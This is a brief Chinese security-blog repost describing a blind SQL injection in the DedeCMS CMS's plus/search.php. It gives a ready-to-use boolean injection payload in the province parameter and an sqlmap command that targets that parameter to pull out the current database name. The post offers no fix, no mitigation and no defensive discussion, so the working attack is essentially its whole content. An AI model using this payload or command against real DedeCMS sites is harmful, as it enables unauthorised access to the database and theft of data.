dedecms plus/search.php sql injection

  • A+
所属分类:安全文章
点击上方蓝字可以订阅哦

plus/search.php?msg=&msgid=&province=msg=&msgid=&province=-9701' OR 6347=6347 AND 'CkEl'='CkEl

属于一个盲注

dedecms plus/search.php sql injection

sql注入命令:

sqlmap -u "" -p province --risk 3 --technique B  --current-db

dedecms plus/search.php sql injection


本文始发于微信公众号(零组攻防实验室):dedecms plus/search.php sql injection

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: